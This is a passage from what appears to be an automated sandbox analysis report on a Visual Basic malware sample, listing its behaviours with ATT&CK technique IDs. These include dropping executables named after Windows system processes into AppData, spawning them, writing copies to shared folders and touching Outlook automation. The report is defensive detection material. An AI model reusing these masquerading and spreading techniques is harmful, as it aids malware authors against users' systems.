00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xk.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xk.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"xk.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 761F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"xk.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"xk.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"xk.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-64", "type": 6, "relevance": 10, "name": "Logged script engine calls", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"Outlook.Application.14.CreateObject\" ... ", "origin": "API Call", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"xk.exe\" (UID: 00000000-00003688) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"xk.exe\" (UID: 00000000-00003688) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"xk.exe\" (UID: 00000000-00003688)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004256)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005476)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001968)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003760)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005196)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"xk.exe\" (UID: 00000000-00003688)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004256)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005476)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001968)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003760)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005196)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xk.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"xk.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Mig2.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Mig2.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"xk.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005328]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005328]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005328]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005328]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005328]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-56", "type": 8, "name": "Drops files with image extension", "description": "\"_1C306CB1-771E-4B4B-A902-86E897877F5B_.png\" has type \"PNG image data 16 x 16 8-bit/color RGB non-interlaced\" and extension \"png\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Windows\\xk.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\xk.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" reads file \"c:\\users\\desktop.ini\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" reads file \"c:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{0006F03A-0000-0000-C000-000000000046}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0006F03A-0000-0000-C000-000000000046}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to touch file \"C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe.cfg\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe.cfg\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe.Local\\\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" trying to access non-existent file \"C:\\cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\share\\xk\\folder.htt\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\share\\data hapubws.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\windows\\xk.exe\"\n 